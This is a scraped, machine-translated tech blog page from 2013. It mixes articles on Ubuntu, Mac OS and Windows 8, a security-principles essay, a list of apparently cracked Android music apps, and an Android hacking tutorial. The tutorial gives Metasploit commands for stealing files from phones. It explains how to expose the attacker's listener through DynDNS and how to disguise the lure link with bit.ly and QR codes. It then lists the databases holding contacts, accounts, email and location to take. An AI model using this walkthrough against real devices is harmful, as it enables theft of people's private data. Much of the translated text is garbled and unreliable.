Mac

Operating system created by Apple for its Macintosh computer line.

Windows 8

But they get Windows technology. The wealth from our family came from Microsoft so why would we invest in a competitor

Hacking and obtaining information from Android devices

A technique of "hacking" the mobile devices with the Android operating system. Let's use the tool already known to some, the Metasploit.

The 5 basic principles for security firms

Security is a trade-off. Business needs must be balanced with security concerns in much the same way as physical security controls

Ubuntu

Ubuntu is a computer operating system based on the Debian Linux distribution and distributed as free and open source software with Linux kernel.

Thursday, 3 January 2013

Android PicsArt – Photo Studio v3.2.2

PicsArt – Photo Studio v3.2.2








All-in-One Picture Editor & photo art community


Install PicsArt – where everyone becomes a great artist!



PicsArt is a free, full-featured photo editor and art community.

Packed with more features than in many paid apps, PicsArt has rocketed to become the #1 photo app on Android and Kindle by wrapping the best of what desktop photo and image editing suites can offer in an amazingly intuitive and easy-to-use user interface. We’ve backed that up with the ability to connect and share your work with a global community of other artists.


IMPORTANTLY, PicsArt will never sell your images. Ever.



PicsArt’s free, full-featured toolkit includes:



* Camera – enables you to take a picture and apply various effects by enhancing your standard camera.



* Picture Editor – Tons of photo manipulations, masks, collages, frames, borders, stickers, text effects, clipart graphics, callouts, crop, rotate, color adjust and more!



* Magic Effects – awesome artistic photo effects such as a stenciler, cartoonizer, sketcher, Orton, Lomo, vintage, cross process, HDR, fattal, pencil, Holgaart, watercolor, contours, comic, neon, gouache, old paper, pastel, red eye remover, Popart 2, smart blur, face fix, color splash, paper

and more!


* Draw – Many drawing effects including: draw, sticker mode, callouts, artistic brushes and text styles! Draw on your Facebook friend’s photos and share your artwork with the World!



* Sharing – if you want to share you images (and in PicsArt you don’t have to), you can quickly share them with other PicsArtists in PicsArt’s photo art community, or by adding photos to Facebook, Twitter, Flickr, Picasa, Dropbox, Fouresquare, Tumblr, Blogger, WordPress and DeviantArt or send photos by SMS and email.



* Live Wallpaper – enjoy amazingly funny color lines.



What’s in this version:

v3.2.2
* New border masks
* Fixes

Android MUSIC PLAYER Collection [30 apps][updated]

Android MUSIC PLAYER Collection [30 apps][updated]






  1.  Apollo+ v1.1
  2.  Astro Player (Unlocked) v1.158
  3.  Bluetooth Music Player v1.6
  4.  BoomBoxoid Music Player HQ PRO v2.4 Build 86
  5.  BubbleUPnP Pro v1.6.3
  6.  doubleTwist Player Premium v1.8.5 (Unlocked)
  7.  GoneMAD Music Player FULL v1.3.21
  8.  Google Play Music v4.4.811H.526848
  9.  Idrod Music v1.0.5
  10.  jetAudio Plus v1.9.3
  11.  Lithium Music Player v2.206
  12.  MixZing Media Player (No Ads) v3.7.2
  13.  Music Folder Player Donate v1.3.5
  14.  n7player Music Player FULL v2.0.5a
  15.  Neutron Music Player v1.65
  16.  NRG Player FULL v1.0.9c
  17.  Pixi Music Player v1.2
  18.  Playerpro Music Player v2.44
  19.  PowerAMP FULL v2.0.8-build-516
  20.  RealPlayer Premium v1.1.2.0
  21.  Rocket Music Player Premium v1.5.2
  22.  Select! Music Player v1.0.1
  23.  Sensor music player v2.2941
  24.  SoundBest Music Player v1.1.8
  25.  TTPod v4.0.1207
  26.  TuneWiki Pro v4.1.0
  27.  UberMusic 1.0.1
  28.  Winamp Pro v1.4.4 Patched
  29.  ZPlayer v3.5.01



   





Ubuntu


Ubuntu is a system maintained by Canonical operativo3 4 and the developer community. It uses a Linux kernel, and its origin is based on Debian.Ubuntu is aimed at the average user, with a strong focus on usability and improve user experience. It consists of multiple software normally distributed under a free license or open source. Web statistics suggest that Ubuntu's market share in "linux distributions" is approximately 49%, and with a tendency to rise as a web server. And a significant increase of 20 million active users by the end of 2011. 
Their sponsor Canonical, is a British company owned by South African entrepreneur Mark Shuttleworth that instead 

of selling Ubuntu for profit, is funded through operating system related services and selling support técnico.11 Moreover, keeping it free of charge, the company is able to leverage the community developers to improve the components of your operating system. Canonical also supports and provides support for the derivations of Ubuntu: Kubuntu, Xubuntu, Edubuntu, Lubuntu and Ubuntu oriented servers (Ubuntu Server). Their slogan is Linux for human beings ('Linux for human beings') and name South Africa stems from the ideology Ubuntu ("Equality / Loyalty to others.").

every six months a new release of Ubuntu which is supported by Canonical, for eighteen months, through security updates, patches for bugs critical programs and minor updates. Versions LTS (Long Term Support), which are released every two years, are supported for five years on the desktop and server. history Ubuntu is a fork of the Debian project's codebase. The goal was to make a distribution of Debian easier to use and understand for end users correcting several errors of this and doing some simple tasks such as program management. Their first release was on 20 October 2004. The Ubuntu releases are timed to take place a month after the desktop environment to modify and offer the latest version of it. Ubuntu uses primarily free software making exceptions for several proprietary drivers besides the non-free firmware and software included in the Linux kernel and present non-free software in their repositories. packs Ubuntu is based on Debian's unstable branch: both distributions use the software package format and deb package management tools APT, dpkg, plus some front-ends. Debian and Ubuntu packages are binary compatible in certain cases, sometimes deb packages may need to be recompiled from source for use on Ubuntu. Many Ubuntu developers also maintain key Debian packages. Ubuntu cooperates with Debian returning changes and improvements in the code, although there are reviews on scarce inputs. In the past, Ian Murdock, founder of Debian, expressed concern about the potential change of the Ubuntu packages with respect to Debian because it could become completely incompatible. before each launch, conducts an import packages from Debian, using the Ubuntu-specific modifications. A month before the release, a process to freeze imports, helping developers to make sure the software is stable enough. since the beginning of the project, Shuttleworth provided the financial support by the profits after selling his company Thawte VeriSign, for about U.S. $ 575 million. On 8 July 2005, Mark Shuttleworth and his company Canonical Ltd. announced the creation of the Ubuntu Foundation and provided $ 10 million as initial budget. The purpose of the foundation is to ensure support and development for all future versions of Ubuntu. On 12 March 2009, Ubuntu announced external support for management platforms cloud computing, like Amazon EC2. early 2009 engineers Canonical and designers realize that the package management and installation of applications is too fragmented and even complex hence planning the creation of a central application for managing and installing applications. In October 2009 Canonical officially launched the Ubuntu Software Center (Ubuntu Software Center), allows you to find, install, uninstall applications, and also allows you to add repositories terceros.25 In October 2010 introduced the sale of applications through payments online at the Ubuntu Software Center. On June 3, 2010, Mark Shuttleworth announced the joint work with the project and its development Linaro open source Linux on ARM technology. In late September disclosed before the release of Ubuntu 10.10, this version include better and more stable support for ARM processors. During October and November 2010, it announced drastic and important changes in the Ubuntu desktop, the inclusion user interface Unity (created by Canonical), which will be used in the desktop version of Ubuntu. Mark Shuttleworth also announced that future versions of Ubuntu, Unity will be implemented in Wayland graphical server, not the graphical server X (as was typical). 




 


Hack Tutorial


The computing world is a complex and constantly changing process. To minimize security risks, companies must pay attention to The "5 basic safety principles"


  1.  100% security does not exist
  2.    Security risks are directly proportional to the complexity of software
  3.    Implement layered security
  4.   Do not allow an intrusion is made reused elsewhere, ignoring safety
  5.   Thinking "We are never ready for intruders," the concept of moving to perfection
100% security does not exist

is impossible to guarantee that all programs running on all your systems are free of any type of bug that could be used to break systems. There are many people who simply write many lines of code, checking and checking very little of his work. This is not just the fault of the software developers. Software development is an extremely complex process and an incorrect character (eg a string) in a program with millions of lines of code can create a security hole. Additionally you can not accurately predict the interactions of thousands of different programs may end in a single network together. It is impossible that the code written is perfect, because the creators are also human and are subject to imperfections, so you should make architectural decisions with this fact in mind. Security is a trade-off. Business needs must be balanced with security concerns in much the same way as physical security controls. Security policies should always be done with a risk assessment and cost / benefit. In the end, the degree of 

safety is always a business decision. Security risks are directly proportional to the complexity of software There are two issues here: the complexity of each software program and the total number of software programs that make up your solution or web server / client site. The more code you have, the more bugs are likely to have. Since all software has bugs, it must be assumed that the errors can be exploited as security holes. Firms should only run software they need to be operational.Companies must eliminate sample programs, scripts and documentation that are unnecessary to the operation of a production system, because there is no reason to take the risk when these programs deliver any operational value. Furthermore, most software means more security updates. So for example, if your basic users do not even use the help of Linux, Windows or any other operating system or application, why then install help? Besides saving space, if any intruder discovering a flaw in the Windows help, for example, and you corrected all applications and the Windows operating system thought, "but I think in Windows Help, there would be no possibility of intrusion," there can be great opportunity to fail and the attacker, it also serves to Linux and other systems. simply not install the default configuration. Most software comes in an insecure configuration and to make it as easy as possible in the intrusion. To eliminate unnecessary security risks, you should "shield" the software or operating system installation, which we call Hardening ¹, or rather virtual shield. In particular, the default settings and passwords should be changed, since they are easily available to hackers and other evil beings. Additional steps that a hardening process may include:


  •  Limiting the software installed to that which is intended for the desired function of the system;
  •  Apply and maintain updated patches, both operating system as applications;
  •  Review and modify the permissions of the file systems, in particular as regards the writing and execution;
  • Enhancing login security, enforcing a strong password policy

Finally, the simplest programs are less likely to have security holes when using them. That's why proxies are a good way to protect the border of the network from external attacks. Proxies are simple programs - they understand the application protocol but not implement the functionality. Therefore, they are safer than the servers they protect. Implement layered security theory "onion". Besides having several layers of the onion, it has a "bad smell". Think about it, form a layered security and created a defense system that is distasteful, offensive attackers. As all code has bugs, you never want to rely on any piece of code as their only line of defense. If you apply multiple layers of security, the hacker can not enter as easily as a weakness in one layer can not represent a total breakdown of the system. For example, if the server is running as a privileged user such as "root" or "admin" and there is a bug anywhere within this large and complex piece of code, a hacker might well gain full administrative access to your computer. If your web server runs as a non-privileged user, so even if a bug is found, the exposure can be controlled. A basic example of software-based "onion theory" to me, is the NMAP. When we run NMAP without using the root account, we can sweep services with some options, but with all the options, just using the root account. So what's the trend? EVER run that NMAP USING THE ROOT ACCOUNT and thus also expose our system to a scan or attack. There are more, just the technique we use IP and MAC SPOOFING SPOOFING and fine. In upcoming articles I will demonstrate that gives that swept to locate a host, even with IP / MAC SPOOFING. allow an intrusion not done is reused elsewhere SecuritySeparation function is essential for safety. You need to have separate 



devices for separate functions and different computer networks with different security levels. This is bad for GreenIT (Green IT, how to save energy for the environment, a good example of the advantages is beyond virtualization). For example, a web server communicates with the outside world, while a server database should only communicate with the web server.Each machine must be on a separate network. So if you have a "break" the web server by a hacker may have access to your email server, but your server database, which is physically isolated and protected by firewalls and other. Keep in mind , security is never about any one thing, but the whole set. Further security is as good as a weak link, something that many companies seem to forget. Firewalls are just one piece of the puzzle so you may need more than one firewall. For example, many companies use virtual private networks (VPNs) to allow two offices can communicate on a form "Internet safe". VPNs have a fundamental Achilles heel that could make them undesirable: if you have a home user connected to a corporate network through a VPN, then the entire corporate network is as secure as the security of the home PC. How safe is your home office? Item:  Backtrack-linux.org

Android


with the operating system Android. Let's use the already known by some tool, the Metasploit with an auxiliary your library can be found in OS BackTrack. This can be possible when a device is connected to your local network, we will use the DynDNS But that gives us a better grasp of the offense and see how obscure the address via QR codes and site links that shorten as Lets start ! Steal files android_htmlfileproviderThe first thing is to get the  msfconsole in terminal backtrack






root @ bt: ~ # / opt/framework3/msf3/msfconsole
Now let's use one of the Metasploit auxiliary modules, which serves exactly our goal:
          msf> use gather / android_htmlfileprovider
.                     msf auxiliary (android_htmlfileprovider)>
Now, let's see the options provided by the module ...
      msf auxiliary (android_htmlfileprovider)> show options
      FILES (Android File we want to steal) 
      SRVHOST (local IP that is waiting for connections)
      SRVPORT (The door will be waiting for connections)
     SSL (ALTERNATIVE - If you want to use SSL connection negotiation)
     SSLVersion (If you have enabled the option above, indicate the version of SSL)
     URIPATH (A URI that will be used)
At the moment, we will not touch the FILES option. Have the option to change SRVPORT 80, because that is the standard HTTP port, and will be more suspicious if connecting to another door. Moreover URIPATH will also change, which by default is a random sequence, the victim will be directed to the root server, make the below:
 
1.     msf auxiliary (android_htmlfileprovider)> set SRVPORT 80
2.     SRVPORT => 80
3.     msf auxiliary (android_htmlfileprovider)> set URIPATH /
4.     URIPATH => /
Now we can only begin to exploit using the command run , expect some device and connect to our IP listener.
 
See the picture below:


Implemented Exploit - CLICK TO ENLARGE
Using DynDNS to increase the range

As we say, if we do this attack only for local area networks (LAN), as smartphones do not usually spend much time connected to a Wi-Fi network that we are interested. But it is possible to increase this holding to do so in this case we will use DynDNS, which is a service that provides dynamic addressing domain site.dyndns type *.Org.

We have to go in http://dyn.com/ site and create an account. After that, you can register the domain that we have chosen. After this would go to the router settings and specify the domain, username and password, as you can see (in other routers may be different).

CLICK TO ENLARGE
I must say that DynDNS is an excellent service. After configuring the DynDNS domain only need to redirect properly on the router ip. That is, in our case, the victim will connect to vidasconcurrentes.dyndns.org (on port 80) and should be set to go to the IP port on which we listen to exploit.


              CLICK TO ENLARGE
Overshadowing the attack with QR codes and bit.ly

We have everything for the attack, would have to pass the url to the victims and wait for it to connect. The problem is that a style vidasconcurrentes.dyndns.org url can be quite suspect. In this case, use a URL shortener, bit.ly we will use (you can find several). 

Finally, if we want a more viral attack, we can create a QR code (http://qrcode.kaywa.com/) using the link shortener bit.ly link given us, and even harder to detect.
The QR will be camouflaged with the link Bit, see the EX: http://bit.ly/q9wRCW that redirect to the DynDNS domain created in the vidasconcurrentes.dyndns.org, who will be listening to exploit .. See Example of QR.

CLICK TO ENLARGE

Having succeeded in his invasion, just use creativity to explore some of the android directories in particular will be listed below: Contacts Database / data / data / com.android.providers.contacts / databases / contacts.dbDatabase  Browser / data / data / com.android.browser / databases / browser.db Database  Accounts / data / data / com.google.android.googleapps / databases / accounts.db Database  Geolocation / data / data / com.android.browser / gears / geolocation.db Directory Database of Telephone / data / data / com.android.providers.telephony / databases / database  of historical / data / data / com.google.android. apps.maps / databases / search_history.db Directory Database  E-Mail / data / data / com.google.android.providers.gmail / databases /




Mac (macintosh)

Mac

Mac OS (Operating System Macintosh English,  Macintosh Operating System) is the name of the operating system created by Apple for its Macintosh computer line. It is known for being the first system for the general public to have a graphical interface consisting of mouse interaction with windows, menus and icon.Apple deliberately downplayed the existence of the operating system in the early years of its Macintosh line for the machine it more user-friendly, differentiating it from other contemporary systems such as MS-DOS, which was a technical challenge. The development team included Mac OS Original Bill Atkinson, Andy Hertzfeld and Jef Raskin.

This was the basis of the classic Mac OS, developed entirely by Apple, whose first version was released in 1984. Its development would extend the system version 9, released in 1999. From version 10 (Mac OS X), change the system architecture and became totally based on Unix, but its graphical interface retains many elements of previous versions.

A variety was developed versions of how the original Mac OS where the underlying ideas originated. Despite this historical documents proving the existence between the Macintosh project and the project of Xerox PARC Alto. Initial contributions of Ivan Sutherland's Sketchpad, and the On-Line System of Doug Engelbart were also significant


History

The Macintosh project started in early 1979 with Jef Raskin, who envisioned a low-cost computer and user friendly for the average customer. In September 1979, he was given permission to Raskin for procurement for the project and was looking, in particular, an engineer who could build a prototype. Bill Atkinson, a team member of the Apple Lisa team, introduced him to Burrell Smith, a service technician who had been hired earlier that year.

In January 1981, Steve Jobs took over the Macintosh project completely. Jobs and several Apple engineers visited Xerox PARC in December 1979, three months after the initiation of projects Lisa and Macintosh. After seeing the pioneering technology developed graphical user interface at Xerox PARC by former employees of Xerox Raskin, Jobs negotiated a visit to see the Xerox Alto computer and Smalltalk development tools in exchange for an option on shares of Apple. Operating systems of Lisa and Macintosh used many concepts Xerox Alto, but many elements of the graphical user interface were created by Apple, including the menu bar, pull-down menus and concepts of drag and drop and direct manipulation.

Unlike the IBM PC, which used a system ROM 8 kB for the POST (self-diagnostics on power) and a basic input / output system (BIOS), the Mac ROM was much larger (64 kB ) and SO kept keycode. Much of the original Mac ROM was coded by Andy Hertzfeld, a member of the original Macintosh computer. He was able to save valuable space in the ROM inserting assembly language code. In addition to the ROM code, also codified the core, the Macintosh Toolbox and part of desktop accessories. Operating system icons, which represent folders and applications, were designed by Susan Kare, who later designed the icons of Microsoft Windows 3.0. Bruce Horn and Steve Capps wrote the Macintosh Finder as well as various system utilities Macintosh.

Apple made a major advertising campaign for refurbished machine. After its establishment, the company purchased 39 full pages of advertising space in the magazine Newsweek, November and December issues of 1984. Apple was so successful in the campaign, soon eclipsed sales of its more sophisticated predecessor, the Lisa, Apple while quickly developed a product called MacWorks that allowed Lisa to emulate the Macintosh system software via the System 3, when which was discontinued and marketed under trademark Macintosh XL. Many of the advances of the Lisa OS would not appear in the OS until System 7.

The first version of Mac OS (simply called System, "System") is easily distinguishable from other operating systems in the same period because it does not use a command line interface, was one of the first operating systems to use a completely one GUI. In addition to the core of the system is the Finder, an application used to manage files, which also showed the desktop. The two files were contained in a folder labeled System Folder ("System Folder"), which contained other files needed, as the printer driver, needed to interact with the system.

Windows 8

Windows 8

1. From mobile devices to PC.
It confirms the changes provided in the interface: Windows 8 is built from what is prevailing on mobile devices. The interface, with a style called 'Metro', which is used by touch and presenting important information in a simple way. The fast and smooth navigation with these touches, bring facilities to manage windows and applications in this way. Will also have notifications and email applications when your computer is idle, such as smartphones and tablets today.
With small 'tiles' or tiles on the screen (similar to widgets) can handle Metro-style applications made especially for Windows 8 - which when enlarged can fill the screen, so take advantage of the space, as in Mac OS X Lion.
In addition, Windows 8 takes all the features of an operating system touch, with an eye on the market for tablets. Although generated some concern if an operating system based on what will be appropriate to touch a desktop computer or a laptop, Microsoft says it will work properly with keyboard and mouse.

2. Applications more 'sociable'.
In Windows 8, applications can work together, communicate with each other. For example, the user can select and email photos from different places and services such as Facebook, Flickr or hard disk.
The system handles a new concept, 'Charms', with which you can configure actions or common settings for various applications, as do searches, share various social networks or send emails The 'charms' are activated by moving the cursor to a end of the screen
Multitasking is not something new to computers, but now is more to see: two applications can run in front of the screen, so the user to simultaneously view what they do. And need not occupy half of the screen: the user can choose the width that occupy each.
During the opening conference BUILD system characteristics were demonstrated by students with applications within 10 weeks, which was intended to show that the development of software is very easy for the new system.

3. Windows Store.
It was already known that Windows 8 would have an application store similar to the Mac OS X Lion has since last January. The Windows Store promises a great advantage for users: Although not the sole mechanism for software distribution, itself will be safer because applications face an approval system similar to what Apple manages to yours, but with a commitment Microsoft: the process to be published will be a day at most.

4. Benefits for developers.
For developers, Windows 8 promises to be a paradise. For one, the store also mentioned the benefit, as will the official store visibility and a new distribution channel. With Visual Studio, developers can make their applications and send them directly to the Windows Store.
In addition, they also have other benefits, such as using more programming languages ​​(including C + +. C # and the Web, such as HTML and JavaScript, plus the language to define styles in a website, CSS).
With these benefits, Microsoft expects more applications made exclusively for Windows 8, so that end users will also benefit.

5. A new system for new hardware.
The big question: is very demanding Windows 8? Does the old computer may have the new system? The good news: Windows 8 will be less 'heavy' than Windows 7, and will require the same hardware of its predecessor. Even, as demonstrated in BUILD, runs smoothly on a 'humble' netbook with Atom processor and only 1 GB of memory, a hard thing to think with another predecessor as Windows Vista. Needless to say, today's applications run on Windows 7 will also run on Windows 8, so that injuries are not expected to upgrade a computer.
In short, Windows 8 is friendly with the past. However, the new system seeks to leverage the new generation of hardware and coming. Not only is compatible with x86 processors ever, but also with ARM-based chips, reigning in tablets and smartphones. So Windows 8 will work well with a 10-inch tablet with a powerful computer with many processor cores.
Moreover, in Ultrabooks, new generation computers with new Intel processors, and have no hard disk but memory SSD, Windows 8 will be able to be activated in seconds (here, a video showing how to make a reality dream of not waiting 3 minutes for a computer can be used just lit). This feature is a market trend that has taken its first steps in the MacBook Air.
In addition, Windows 8 promises efficient use of memory, which proved to a demonstration of system memory consumption: 404 MB of memory by Windows 7 and only 281 MB, like in a computer, from Windows 8. There is a promise in the use of energy, according to which the battery on mobile devices last longer than current systems, and these netbooks will last all day.

6. Resurrection painless.
A user can restore your Windows 8 operating system, if you have serious problems with your computer, for example by malware infections, without losing data, applications and settings. This has been a skill in previous operating systems, not easy to apply for basic or intermediate users, and promise to refresh function is to be a cinch.

7. Taking the juice to the cloud.
Content created on a computer or a tablet with Windows 8 automatically syncs all your other devices, thanks to Windows Live and Windows SkyDrive. Live goes all the contents of the cloud services you use most (photos, email, calendar and contacts), and updates on other teams. With Windows SkyDrive will have access to content anywhere you want (similar to services such as Dropbox and iCloud).
Emphasis was placed on the service SkyDrive cloud storage and what to do with it, and now Microsoft promises that all the settings are taken on a computer can be taken to another through Windows Live.

8. Xbox Live comes to Windows.
Windows 8 will have access to Xbox Live, which will lead to computers and tablets offer games, music, movies and television content. During BUILD, software developers can develop applications will see how to use this new feature.